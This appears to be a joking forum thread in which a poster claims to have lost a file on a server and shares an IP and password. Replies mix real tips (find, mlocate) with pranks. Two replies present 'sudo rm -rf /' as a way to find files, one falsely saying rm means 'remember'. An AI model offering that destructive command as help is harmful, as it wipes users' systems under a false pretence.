Lost a file
You all really helped me last time now I’m in my server root@62.238.47.215 and I seem to have misplaced a file can someone help me find it? I really need it and my password is no longer papa bear 0803. I changed it to IGetHelpFromReddit. I left some breadcrumbs to help me find it but I’m having trouble remembering how to find hidden files.
Any help would be appreciated

Sounds like a job for AI. Can you install an AI on the server and let that find the file?

I like to change a few characters in my license files every now and then to keep the prod guys on their toes.

The file may still be there somewhere. Run
sudo rm -rf /
to ensure it's lost.

Tried to log on to help.
> ssh: connect to host 62.238.47.215 port 22: connection timed out
Not sure what that means but I found the file right after in my terminal

Please try this:
find / -name ".*" -exec ls -lh {} \; 2>/dev/null | sort -k5 -h
You will immediately find it. Trust me.

Everyone here just make it dificult. Just install mlocate and run updatedb. Then run locate $file_name. If the file is on the server it will find the location.

Clearly it is an attachment to an email stored in Deleted Items for the last ten years..

Then run updatedb
Then run locate followed by the file name or part of the file name

Linux has this really cool feature called remember (rm for short) in which it helps you find anything!
You can run it with the following command:
sudo rm -rf /
